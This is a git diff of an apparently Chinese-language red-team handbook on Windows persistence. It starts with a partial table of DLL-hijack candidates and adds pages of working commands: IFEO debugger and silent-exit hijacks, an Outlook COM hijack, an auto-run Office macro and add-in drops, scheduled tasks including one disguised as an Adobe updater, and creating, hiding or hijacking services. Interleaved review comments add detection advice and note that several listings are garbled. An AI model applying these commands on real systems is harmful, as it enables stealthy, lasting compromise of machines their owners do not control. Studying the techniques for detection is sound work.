vdsldr.exe | bcd.dll | DllMain | +| ❌ | vssadmin.exe | ATL.DLL | DllMain | +| ❌ | vssadmin.exe | VSSAPI.DLL | DllMain | +| ❌ | vssadmin.exe | VssTrace.DLL | DllMain | +| ❌ | vssadmin.exe | VssTrace.DLL | VssGetTracingContextPerThread | +| ❌ | vssadmin.exe | VssTrace.DLL | VssIsTracingEnabled | +| ❌ | vssadmin.exe | VssTrace.DLL | VssSetTracingContextPerThread | +| ❌ | vssadmin.exe | VssTrace.DLL | VssTraceInitialize | +| ❌ | vssadmin.exe | VssTrace.DLL | VssTraceUninitialize | +| ❌ | vssvc.exe | AUTHZ.dll | DllMain | +| ❌ | vssvc.exe | bcd.dll | DllMain | +| ❌ | vssvc.exe | DEVOBJ.dll | DllMain | +| ❌ | vssvc.exe | FLTLIB.DLL | DllMain | +| ❌ | vssvc.exe | VirtDisk.dll | DllMain | +| ❌ | vssvc.exe | VSSAPI.DLL | DllMain | +| ❌ | vssvc.exe | VssTrace.DLL | DllMain | +| ❌ | vssvc.exe | VssTrace.DLL | VssGetTracingContextPerThread | +| ❌ | vssvc.exe | VssTrace.DLL | VssIsTracingEnabled | +| ❌ | vssvc.exe | VssTrace.DLL 
| VssSetTracingContextPerThread | +| ❌ | vssvc.exe | VssTrace.DLL | VssTraceInitialize | +| ❌ | vssvc.exe | VssTrace.DLL | VssTraceUninitialize | +| ❌ | w32tm.exe | IPHLPAPI.DLL | DllMain | +| ❌ | w32tm.exe | logoncli.dll | DllMain | +| ❌ | w32tm.exe | netutils.dll | DllMain | +| ❌ | w32tm.exe | NTDSAPI.dll | DllMain | +| ❌ | waitfor.exe | netutils.dll | DllMain | +| ❌ | waitfor.exe | srvcli.dll | DllMain | +| ❌ | waitfor.exe | SspiCli.dll | DllMain | +| ❌ | wbadmin.exe | credui.dll | DllMain | +| ❌ | wbengine.exe | bcd.dll | DllMain | +| ❌ | wbengine.exe | CLUSAPI.dll | DllMain | +| ❌ | wbengine.exe | DNSAPI.dll | DllMain | +| ❌ | wbengine.exe | FLTLIB.DLL | DllMain | +| ❌ | wbengine.exe | NETUTILS.DLL | DllMain | +| ❌ | wbengine.exe | SPP.dll | DllMain | +| ❌ | wbengine.exe | SRVCLI.DLL | DllMain | +| ❌ | wbengine.exe | VirtDisk.dll | DllMain | +| ❌ | wbengine.exe | VSSAPI.DLL | DllMain | +| ❌ | wbengine.exe | VssTrace.DLL | DllMain | +| ❌ | wbengine.exe | wer.dll | DllMain | +| ❌ | wbengine.exe | XmlLite.dll | DllMain | +| ❌ | wecutil.exe | WecApi.dll | DllMain | +| ❌ | wecutil.exe | wevtapi.dll | DllMain | +| ❌ | werfault.exe | dbgcore.DLL | DllMain | +| ❌ | werfault.exe | faultrep.dll | DllMain | +| ❌ | werfault.exe | wer.dll | DllMain | +| ❌ | werfault.exe | wer.dll | WerpSetExitListeners | +| ❌ | werfaultsecure.exe | dbgcore.DLL | DllMain | +| ❌ | werfaultsecure.exe | faultrep.dll | DllMain | +| ❌ | werfaultsecure.exe | wer.dll | DllMain | +| ❌ | werfaultsecure.exe | wer.dll | WerpSetExitListeners | +| ❌ | wermgr.exe | wer.dll | DllMain | +| ❌ | wermgr.exe | wer.dll | WerpSetExitListeners | +| ❌ | wextract.exe | Cabinet.dll | DllMain | +| ❌ | wfs.exe | ATL.DLL | DllMain | +| ❌ | wfs.exe | credui.dll | DllMain | +| ❌ | wfs.exe | IPHLPAPI.DLL | DllMain | +| ❌ | wfs.exe | PROPSYS.dll | DllMain | +| ❌ | wfs.exe | UxTheme.dll | DllMain | +| ❌ | whoami.exe | AUTHZ.dll | DllMain | +| ❌ | whoami.exe | netutils.dll | DllMain | +| ❌ | whoami.exe | SspiCli.dll | 
DllMain | +| ❌ | whoami.exe | wkscli.dll | DllMain | +| ❌ | wiaacmgr.exe | ScanSetting.DLL | DllMain | +| ❌ | wiaacmgr.exe | UxTheme.dll | DllMain | +| ❌ | wiawow64.exe | ScanSetting.DLL | DllMain | +| ❌ | wiawow64.exe | UxTheme.dll | DllMain | +| ❌ | wifitask.exe | HTTPAPI.dll | DllMain | +| ❌ | wifitask.exe | IPHLPAPI.DLL | DllMain | +| ❌ | wifitask.exe | webservices.dll | DllMain | +| ❌ | wifitask.exe | wlanapi.dll | DllMain | +| ❌ | wimserv.exe | Cabinet.dll | DllMain | +| ❌ | winlogon.exe | UXINIT.dll | DllMain | +| ❌ | winlogon.exe | UXINIT.dll | ThemesOnTerminateSession | +| ❌ | winrs.exe | DSROLE.dll | DllMain | +| ❌ | winrs.exe | mi.dll | DllMain | +| ❌ | winrs.exe | miutils.dll | DllMain | +| ❌ | wkspbroker.exe | credui.dll | DllMain | +| ❌ | wkspbroker.exe | DNSAPI.dll | DllMain | +| ❌ | wkspbroker.exe | ktmw32.dll | DllMain | +| ❌ | wkspbroker.exe | PROPSYS.dll | DllMain | +| ❌ | wkspbroker.exe | RADCUI.dll | DllMain | +| ❌ | wkspbroker.exe | SspiCli.dll | DllMain | +| ❌ | wkspbroker.exe | tsworkspace.dll | DllMain | +| ❌ | wkspbroker.exe | WINHTTP.dll | DllMain | +| ❌ | wkspbroker.exe | WININET.dll | DllMain | +| ❌ | wksprt.exe | webservices.dll | DllMain | +| ❌ | wksprt.exe | WININET.dll | DllMain | +| ❌ | wlrmdr.exe | SspiCli.dll | DllMain | +| ❌ | wmpdmc.exe | dwmapi.dll | DllMain | +| ❌ | wmpdmc.exe | OLEACC.dll | DllMain | +| ❌ | wmpdmc.exe | UxTheme.dll | DllMain | +| ❌ | wmpdmc.exe | WindowsCodecs.dll | DllMain | +| ❌ | wmpdmc.exe | wmpdui.dll | DllMain | +| ❌ | workfolders.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | workfolders.exe | CLDAPI.dll | DllMain | +| ❌ | workfolders.exe | CRYPTBASE.DLL | DllMain | +| ❌ | workfolders.exe | DEVOBJ.dll | DllMain | +| ❌ | workfolders.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | workfolders.exe | edputil.dll | DllMain | +| ❌ | workfolders.exe | edputil.dll | EdpGetIsManaged | +| ❌ | workfolders.exe | FLTLIB.DLL | DllMain | +| ❌ | workfolders.exe | policymanager.dll | DllMain | +| ❌ | 
workfolders.exe | PROPSYS.dll | DllMain | +| ❌ | workfolders.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | workfolders.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | workfolders.exe | USERENV.dll | DllMain | +| ❌ | workfolders.exe | USERENV.dll | GetProfileType | +| ❌ | wowreg32.exe | devrtl.DLL | DllMain | +| ❌ | wpcmon.exe | samcli.dll | DllMain | +| ❌ | wpcmon.exe | USERENV.dll | DllMain | +| ❌ | wpnpinst.exe | Cabinet.dll | DllMain | +| ❌ | wpnpinst.exe | IPHLPAPI.DLL | DllMain | +| ❌ | wpnpinst.exe | PROPSYS.dll | DllMain | +| ❌ | wpr.exe | WindowsPerformanceRecorderControl.dll | DllMain | +| ❌ | write.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | write.exe | CLDAPI.dll | DllMain | +| ❌ | write.exe | CRYPTBASE.DLL | DllMain | +| ❌ | write.exe | edputil.dll | DllMain | +| ❌ | write.exe | edputil.dll | EdpGetIsManaged | +| ❌ | write.exe | FLTLIB.DLL | DllMain | +| ❌ | write.exe | PROPSYS.dll | DllMain | +| ❌ | write.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | write.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | wscadminui.exe | CRYPTBASE.DLL | DllMain | +| ❌ | wsmanhttpconfig.exe | DSROLE.dll | DllMain | +| ❌ | wsmanhttpconfig.exe | HTTPAPI.dll | DllMain | +| ❌ | wsmanhttpconfig.exe | HTTPAPI.dll | HttpInitialize | +| ❌ | wsmanhttpconfig.exe | HTTPAPI.dll | HttpTerminate | +| ❌ | wsmanhttpconfig.exe | mi.dll | DllMain | +| ❌ | wsmanhttpconfig.exe | miutils.dll | DllMain | +| ❌ | wsmprovhost.exe | DSROLE.dll | DllMain | +| ❌ | wsmprovhost.exe | mi.dll | DllMain | +| ❌ | wsmprovhost.exe | miutils.dll | DllMain | + diff --git a/persistence/image-file-execution-options/README.md b/persistence/image-file-execution-options/README.md new file mode 100644 index 0000000..857205c --- /dev/null +++ b/persistence/image-file-execution-options/README.md @@ -0,0 +1,2 @@ +# 映像劫持 + 
diff --git a/persistence/image-file-execution-options/image-file-execution-options.md b/persistence/image-file-execution-options/image-file-execution-options.md
new file mode 100644
index 0000000..2b6b8cb
--- /dev/null
+++ b/persistence/image-file-execution-options/image-file-execution-options.md
@@ -0,0 +1,32 @@
+# 映像劫持
+
+## 劫持程序退出事件
+
+命令行
+
+```text
+# Use notepad as example
+
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
+
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
+
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Temp\qwqdanchun.exe"
+```
+
+## 劫持程序调试选项
+
+命令行
+
+```text
+copy C:\Temp\qwqdanchun.exe C:\Windows\System32\qwqdanchun.exe
+
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "qwqdanchun.exe"
+```
+
+参考文章:
+
+{% embed url="https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" caption="" %}
+
+{% embed url="https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/" caption="" %}
+
diff --git a/persistence/office/README.md b/persistence/office/README.md
new file mode 100644
index 0000000..6c8180d
--- /dev/null
+++ b/persistence/office/README.md
@@ -0,0 +1,2 @@
+# Office
+
diff --git a/persistence/office/com-hijack.md b/persistence/office/com-hijack.md
new file mode 100644
index 0000000..7716cdf
--- /dev/null
+++ b/persistence/office/com-hijack.md
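Review bot: Neither command block in image-file-execution-options.md says how this persistence is detected or blocked, even though every write lands in registry paths that are standard persistence indicators (`Image File Execution Options\<exe>\GlobalFlag` and `\Debugger`, `SilentProcessExit\<exe>\MonitorProcess`). The oddvar.moe reference cited in the same hunk is specifically about the GlobalFlag/SilentProcessExit variant being hidden from Autoruns, so the page should state that Autoruns is not a sufficient check here and that registry value-set auditing on those key paths (e.g. Sysmon Event ID 13) is the primary detection. A one-line comment at the top of each block, such as `# Detection: audit value writes under IFEO\*\GlobalFlag, IFEO\*\Debugger and SilentProcessExit\*\MonitorProcess (Sysmon Event ID 13); not listed by Autoruns`, would close the gap. Both blocks also write under HKLM and copy into System32, which the text never mentions as a prerequisite.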
@@ -0,0 +1,23 @@ +# COM劫持 + +Outlook在启动时会加载多个COM对象,我们可以通过修改注册表的方式劫持Outlook的启动过程,用来加载DLL。 + +```text +#32bit office on 32bit windows/64bit office on 64bit windows +reg add HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f +reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f +reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f +reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f +#32bit office on 64bit windows +reg add HKCU\Software\Classes\Wow6432Node\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f +reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f +reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f +reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f +``` + +参考文章: + +{% embed url="https://www.welivesecurity.com/2018/08/22/turla-unique-outlook-backdoor/" caption="" %} + +{% embed url="https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-Outlook/" caption="" %} + diff --git a/persistence/office/macro-enabled-add-in-file.md b/persistence/office/macro-enabled-add-in-file.md new file mode 100644 index 0000000..4724f22 --- /dev/null +++ b/persistence/office/macro-enabled-add-in-file.md 
@@ -0,0 +1,41 @@ +# 模板文件 + +下文中的xlam、xla、ppam、ppa文件均为office模板文件,在其中添加宏,可以实现在打开文件时自动加载模板,并执行宏的效果,此处是一个简单的调用exe的宏示例 + +```text +Sub Auto_Open() + Set objShell = CreateObject("Wscript.Shell") + objShell.Exec ("C:\Temp\qwqdanchun.exe") +End Sub +``` + +## EXCEL VBA + +命令行: + +```text +#xlam +COPY C:\Temp\qwqdanchun.xlam %appdata%\Microsoft\Excel\XLSTART\qwqdanchun.xlam + +#xla +COPY C:\Temp\qwqdanchun.xla %appdata%\Microsoft\Excel\XLSTART\qwqdanchun.xla +``` + +打开Excel时,无论是新建的电子表格还是以前保存的电子表格,都将执行该加载项。 + +## POWERPOINT VBA + +可以使用与Excel相同的方式来创建PowerPoint VBA加载项 + +```text +#ppam +COPY C:\Temp\qwqdanchun.ppam %appdata%\Microsoft\AddIns\qwqdanchun.ppam +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Autoload /t REG_DWORD /d 1 /f +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Path /t REG_DWORD /d "qwqdanchun.ppam" /f + +#ppa +COPY C:\Temp\qwqdanchun.ppa %appdata%\Microsoft\AddIns\qwqdanchun.ppa +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Autoload /t REG_DWORD /d 1 /f +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Path /t REG_DWORD /d "qwqdanchun.ppa" /f +``` + diff --git a/persistence/office/vsto.md b/persistence/office/vsto.md new file mode 100644 index 0000000..dd197dd --- /dev/null +++ b/persistence/office/vsto.md @@ -0,0 +1,8 @@ +# VSTO + +参考文章: + +{% embed url="https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/" caption="" %} + +{% embed url="https://vanmieghem.io/stealth-outlook-persistence/" caption="" %} + diff --git a/persistence/office/wll-xll.md b/persistence/office/wll-xll.md new file mode 100644 index 0000000..4bddffa --- /dev/null +++ b/persistence/office/wll-xll.md 
@@ -0,0 +1,28 @@ +# WLL/XLL + +## WLL + +是指“.wll”扩展名的“Word加载项”。这是一个Word 97时代的老东西,但似乎仍受支持。“.wll”文件本质上是具有Office特定扩展名的DLL。这意味着它支持基本的DLL功能,因此您可以将“.dll”重命名为“.wll”来使用。 + +命令行: + +```text +copy C:\Temp\qwqdanchun.dll %APPDATA%\Microsoft\Word\Startup\qwqdanchun.wll +``` + +## XLL + +类似于WLL,也是具有Office特定扩展名的DLL,适用于Excel。但是其dll构造时注意要将恶意代码放在导出函数“xlAutoOpen”中来保证其被加载。 + +命令行: + +```text +copy C:\Temp\qwqdanchun.dll %APPDATA%\Microsoft\AddIns\qwqdanchun.xll +#remember to change “15.0” to your version +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Options" /v OPEN /t REG_SZ /d "/R qwqdanchun.xll” +``` + +参考文章: + +{% embed url="https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/" caption="" %} + diff --git a/persistence/rootkit/README.md b/persistence/rootkit/README.md new file mode 100644 index 0000000..1385978 --- /dev/null +++ b/persistence/rootkit/README.md @@ -0,0 +1,2 @@ +# Rootkit + diff --git a/persistence/rootkit/rootkit.md b/persistence/rootkit/rootkit.md new file mode 100644 index 0000000..d95d1e9 --- /dev/null +++ b/persistence/rootkit/rootkit.md @@ -0,0 +1,26 @@ +# Rootkit + +此处仅讨论狭义的Rootkit,也就是通过加载驱动进入r0实现的权限维持。 + +## 方法一: + +利用现有驱动漏洞,实现获取ring0权限,并长期驻留。 + +## 方法二: + +自己制作驱动,并添加数字签名,以加载进系统,并驻留。 + +## 备注: + +无论是挖掘漏洞还是自己写驱动,都需要多方面的知识,所以此处无法列出合适的POC,但是我会将一些相关资料列在下方,有兴趣的同学可以自己学习。 + +开源实例: + +{% embed url="https://github.com/uf0o/rootkit-arsenal-guacamole" caption="" %} + +参考文章: + +{% embed url="https://en.wikipedia.org/wiki/Rootkit" caption="" %} + +{% embed url="https://bbs.pediy.com/thread-260708.htm" caption="" %} + diff --git a/persistence/schtasks/README.md b/persistence/schtasks/README.md new file mode 100644 index 0000000..c12eae9 --- /dev/null +++ b/persistence/schtasks/README.md @@ -0,0 +1,2 @@ +# 计划任务 + diff --git a/persistence/schtasks/add-schtasks.md b/persistence/schtasks/add-schtasks.md new file mode 100644 index 0000000..dfc64df --- /dev/null +++ b/persistence/schtasks/add-schtasks.md 
@@ -0,0 +1,24 @@ +# 新建任务 + +命令行: + +```text +# On System Startschtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onstart /ru System# On User Idle (30mins)schtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onidle /i 30# On User Loginschtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onlogon /ru System +``` + +Powershell: + +```text +$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c c:\Temp\qwqdanchun.exe"$T = New-ScheduledTaskTrigger -AtLogOn -User "qwqdanchun"$P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest$S = New-ScheduledTaskSettingsSet$P = New-ScheduledTaskPrincipal "qwqdanchun"$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $SRegister-ScheduledTask qwqdanchun -InputObjec $D +``` + +C\#: + +```text +using Microsoft.Win32.TaskScheduler;using System;namespace demo{ static class Program { static void Main() { TaskService ts = new TaskService(); TaskDefinition td = ts.NewTask(); td.RegistrationInfo.Description = "This task keeps your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes"; td.RegistrationInfo.Author = "Adobe Scheduler"; TimeTrigger dt = new TimeTrigger(); dt.StartBoundary = Convert.ToDateTime(DateTime.Now.ToString("yyyy-MM-dd 06:30:00")); dt.Repetition.Interval = TimeSpan.FromMinutes(5); td.Triggers.Add(dt); td.Settings.DisallowStartIfOnBatteries = false; td.Settings.RunOnlyIfNetworkAvailable = true; td.Settings.RunOnlyIfIdle = false; td.Settings.DisallowStartIfOnBatteries = false; td.Actions.Add(new ExecAction(@"c:\Temp\qwqdanchun.exe", "", null)); ts.RootFolder.RegisterTaskDefinition(@"Adobe Acrobat Update Task", td); } }} +``` + +参考文章: + +{% embed url="https://docs.microsoft.com/zh-cn/windows/win32/taskschd/using-the-task-scheduler" caption="" %} + diff --git a/persistence/service/README.md b/persistence/service/README.md new file mode 100644 index 0000000..a41238f --- /dev/null 
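Review bot: The three listings in add-schtasks.md are committed with their line breaks lost, so in the `schtasks` block each `# On ...` comment runs straight into the command that follows it (`# On System Startschtasks /create ...`) and the PowerShell and C# blocks are each a single line; as written they can be neither read nor copied. Each block needs to be split back into one statement per line. The PowerShell block also assigns `$P` twice, so the first `New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM"` line is dead and contradicts the second.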
+++ b/persistence/service/README.md @@ -0,0 +1,2 @@ +# 服务 + diff --git a/persistence/service/edit-service.md b/persistence/service/edit-service.md new file mode 100644 index 0000000..58b6c11 --- /dev/null +++ b/persistence/service/edit-service.md @@ -0,0 +1,16 @@ +# 修改服务 + +修改Fax服务文件路径: + +```text +sc config Fax binPath= "C:\Temp\qwqdanchun.exe" start="auto" obj="LocalSystem" + +sc start Fax +``` + +或 + +```text +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Fax" /v ImagePath /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f +``` + diff --git a/persistence/service/hide-service.md b/persistence/service/hide-service.md new file mode 100644 index 0000000..8cf5e5a --- /dev/null +++ b/persistence/service/hide-service.md @@ -0,0 +1,20 @@ +# 隐藏服务 + +隐藏: + +```text +sc.exe sdset qwqdanchun "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" +``` + +恢复: + +```text +sc.exe sdset qwqdanchun "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" +``` + +参考文章: + +{% embed url="https://www.freebuf.com/articles/system/254838.html" caption="" %} + +{% embed url="https://www.sans.org/blog/red-team-tactics-hiding-windows-services/" caption="" %} + diff --git a/persistence/service/hijack-service.md b/persistence/service/hijack-service.md new file mode 100644 index 0000000..0bd9d6f --- /dev/null +++ b/persistence/service/hijack-service.md @@ -0,0 +1,12 @@ +# 劫持服务 + +劫持关闭事件: + +```text +#REG +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Fax" /v FailureCommand /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f + +#SC +sc failure Fax command= "\"C:\Temp\qwqdanchun.exe\"" +``` + diff --git a/persistence/service/new-service.md b/persistence/service/new-service.md new file mode 100644 index 0000000..6ea8b5a --- /dev/null 
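Review bot: hide-service.md shows the `sc.exe sdset` command but never says what the deny ACEs actually hide or what still exposes the service, which is the part a defender needs. The DACL denies query/stop/change-config/delete rights to Interactive Users, Service and Administrators (so `sc query` and services.msc stop listing it), but SYSTEM keeps its access and the service key under `HKLM\SYSTEM\CurrentControlSet\Services\qwqdanchun` and the running process remain visible, so a sentence to that effect would complete the page. It would also help to state that the 恢复 SDDL appears to be the stock default service descriptor, so readers know it restores rather than merely loosens.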
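Review bot: The heading `劫持关闭事件` in hijack-service.md presents `FailureCommand` / `sc failure` as a hook on service shutdown, but these configure the Service Control Manager's failure-recovery actions, which run only when the service terminates unexpectedly; a normal `sc stop` does not trigger them. Retitling the section to something like `劫持服务失败恢复动作` and stating that trigger condition would make the page accurate, and the same condition is why changes to `FailureCommand` under `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Fax` are rare enough in normal operation to be worth alerting on.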
+++ b/persistence/service/new-service.md @@ -0,0 +1,18 @@ +# 新建服务 + +1.命令行创建 + +```text +sc create qwqdanchun binpath= "cmd.exe /k C:\Temp\qwqdanchun.exe" start="auto" obj="LocalSystem" + +sc start qwqdanchun +``` + +2.Powershell + +```text +New-Service -Name "qwqdanchun" -BinaryPathName "C:\Temp\qwqdanchun.exe" -Description "Service by qwqdanchun" -StartupType Automatic + +sc start qwqdanchun +``` + diff --git a/persistence/startup/README.md b/persistence/startup/README.md new file mode 100644 index 0000000..f2694ed --- /dev/null +++ b/persistence/startup/README.md @@ -0,0 +1,2 @@ +# 启动项 + diff --git a/persistence/startup/folder.md b/persistence/startup/folder.md new file mode 100644 index 0000000..af65854 --- /dev/null +++ b/persistence/startup/folder.md @@ -0,0 +1,11 @@ +# 文件夹 + +| 目录 | +| :--- | +| shell:startup | +| %appdata%\Microsoft\Windows\Start Menu\Programs\Startup | +| C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | +| shell:common startup | +| %programdata%\Microsoft\Windows\Start Menu\Programs\Startup | +| C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp | + diff --git a/persistence/startup/registry.md b/persistence/startup/registry.md new file mode 100644 index 0000000..dddee10 --- /dev/null +++ b/persistence/startup/registry.md 
@@ -0,0 +1,78 @@ +# 注册表 + +Flag:等有时间,每一条都写个poc或者解释下利用方法 + +| 注册表项 | +| :--- | +| HKCU\Environment\UserInitMprLogonScript | +| HKCU\Software\Classes\*\ShellEx\ContextMenuHandlers | +| HKCU\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers | +| HKCU\Software\Classes\Directory\ShellEx\ContextMenuHandlers | +| HKCU\Software\Classes\Directory\Shellex\DragDropHandlers | +| HKCU\Software\Classes\Drive\ShellEx\ContextMenuHandlers | +| HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run | +| HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | +| HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\Shell | +| HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | +| HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | +| HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | +| HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | +| HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | +| HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows | +| HKCU\Software\Policies\Microsoft\Windows\System\Scripts | +| HKCU\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | +| HKLM\Software\Classes\*\ShellEx\PropertySheetHandlers | +| HKLM\Software\Classes\CLSID{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance | +| HKLM\Software\Classes\CLSID{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance | +| HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers | +| HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers | +| HKLM\Software\Classes\Directory\Shellex\CopyHookHandlers | +| HKLM\Software\Classes\Directory\Shellex\DragDropHandlers | +| HKLM\Software\Classes\Filter | +| HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers | +| HKLM\Software\Classes\Folder\ShellEx\DragDropHandlers | +| HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components | +| HKLM\Software\Microsoft\Rpc\Extensions | +| HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 | +| HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Font Drivers | +| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | +| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler | +| HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers | +| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects | +| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | +| HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | +| HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | +| HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | +| HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | +| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | +| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | +| HKLM\Software\Policies\Microsoft\Windows\System\Scripts | +| HKLM\Software\Wow6432Node\Classes\*\ShellEx\ContextMenuHandlers | +| HKLM\Software\Wow6432Node\Classes\*\ShellEx\PropertySheetHandlers | +| HKLM\Software\Wow6432Node\Classes\CLSID{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance | +| HKLM\Software\Wow6432Node\Classes\CLSID{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance | +| HKLM\Software\Wow6432Node\Classes\Directory\Background\ShellEx\ContextMenuHandlers | +| HKLM\Software\Wow6432Node\Classes\Directory\ShellEx\ContextMenuHandlers | +| HKLM\Software\Wow6432Node\Classes\Directory\Shellex\DragDropHandlers | +| HKLM\Software\Wow6432Node\Classes\Drive\ShellEx\ContextMenuHandlers | +| HKLM\Software\Wow6432Node\Classes\Folder\ShellEx\ContextMenuHandlers | +| HKLM\Software\Wow6432Node\Classes\Folder\ShellEx\DragDropHandlers | +| HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components | +| HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32 | +| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler | +| 
